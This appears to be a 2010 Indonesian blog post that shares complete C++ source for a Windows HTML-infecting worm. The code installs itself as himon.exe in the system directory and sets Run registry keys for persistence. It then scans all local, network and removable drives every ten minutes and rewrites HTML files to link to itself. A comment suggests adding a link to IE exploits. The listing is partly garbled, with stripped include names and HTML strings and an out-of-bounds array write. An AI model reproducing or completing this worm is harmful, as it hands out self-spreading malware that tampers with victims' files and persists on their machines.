Saturday, February 27, 2010

Buat Agan" yang seneng ngoprek C++ (Html worm c++ source code)

Code:
html worm
// name: win32.htmlworm
// author: fudc
// compiler: borland c++
// description: this worm spreads by adding a link to itself in html files

// improvements: you could add a link to a page containing an ie exploits

#include
#include

using namespace std; //

// this function does the real work
void htmlspread(char *htmlfile)
{
handle html_fd;
dword html_filesize,read_bytes,written_bytes;
char *c_htmlcode = null;
string *htmlcode = null; // make it simpler
long pos;

// open the html file
html_fd = createfile(htmlfile,generic_read|generic_write,
file_share_read|file_share_write,null,open_existing,file_attribute_normal,null);

if(html_fd == invalid_handle_value)
{
return;
}

// get file size
html_filesize = getfilesize(html_fd,null);

// allocate enough memory
c_htmlcode = (char *)malloc(html_filesize);

if(c_htmlcode == null)
{
return;
}

// read entire file
if(readfile(html_fd,c_htmlcode,html_filesize,&read_bytes,null) == 0)
{
closehandle(html_fd);
return;
}

// create a string object
htmlcode = new string(c_htmlcode);
free(c_htmlcode);

// already infected ?
if(htmlcode->find("") == string::npos)
{

pos = htmlcode->find("");

if(pos == string::npos)
{
pos = htmlcode->find("");

if(pos == string::npos)
{
closehandle(html_fd);
delete htmlcode;
return;
}
}

// add link
htmlcode->replace(pos,7,"\r\n\r\n");

// write new file
setfilepointer(html_fd,0,0,file_begin);
writefile(html_fd,htmlcode->c_str(),htmlcode->size(),&written_bytes,null);
// infection mark
writefile(html_fd,"",36,&written_bytes,null);

}

// close all
closehandle(html_fd);
delete htmlcode;

}

// add worm to startup list
void autostart(char *my_path)
{
hkey hkey;

if(regopenkeyex(hkey_local_machine,
"software\\microsoft\\windows\\currentversion\\run",0,
key_write,&hkey)==error_success)
{
regsetvalueex(hkey,"himon",0,reg_sz,my_path,strlen(my_path));
regclosekey(hkey);
}

if(regopenkeyex(hkey_current_user,
"software\\microsoft\\windows\\currentversion\\run",0,
key_write,&hkey)==error_success)
{
regsetvalueex(hkey,"himon",0,reg_sz,my_path,strlen(my_path));
regclosekey(hkey);
}
}

// this will scan drives for html files
void s3arch(char *pt) {
char sc[max_path],buf[max_path];
win32_find_data in;
handle fd,file;
char *fm = "%s\\%s",*fm1 = "%s\\*.*";

if(strlen(pt) == 3)
{
pt[2] = '\0'; /* :-) */
}

sprintf(sc,fm1,pt);
fd = findfirstfile(sc,&in);

do
{

sprintf(buf,fm,pt,in.cfilename);

/* dot */
if(strcmp(in.cfilename,"..") != 0 && strcmp(in.cfilename,".") != 0 && (in.dwfileattributes & file_attribute_directory))
{
s3arch(buf);
}

/* file found */
else
{

/* is it good to infect ? */

if(strstr(in.cfilename,".html") || strstr(in.cfilename,".htm"))
{
htmlspread(buf);
}
}

}while(findnextfile(fd,&in));

findclose(fd);
}


// entry point of worm
int winapi winmain (hinstance hinstance, hinstance hprevinstance, lpstr lpcmdline, int ncmdshow)
{
// usual shit: installation part, startup and so on ...
char i_am_here[max_path],installation_path[max_path];
char drives[3],drive = 0;
uint drive_type;


// only one copy
createmutex(null,false,"__htmlworm_by_wargame_eof__");
if(getlasterror() == error_already_exists)
{
exitprocess(0);
}

getsystemdirectory(installation_path,max_path);
strcat(installation_path,"\\himon.exe");

getmodulefilename(null,i_am_here,max_path);
// copy!
copyfile(i_am_here,installation_path,false);
autostart(installation_path);


// the real part starts here
while(1)
{

/* search for drives */
for(drive = 'c';drive <= 'z';drive++)
{
drives[0] = drive;
drives[1] = ':';
drives[2] = '\\';
drives[3] = '\0';

/* drive ? */
drive_type = getdrivetype(drives);

/* only fixed, remote and removable drives */
if(drive_type == drive_fixed ||
drive_type == drive_remote ||
drive_type == drive_removable)
{
/* go! */
s3arch(drives);
}
}

/* every 10 minutes */
sleep((1000*60)*10);
}
}

No comments: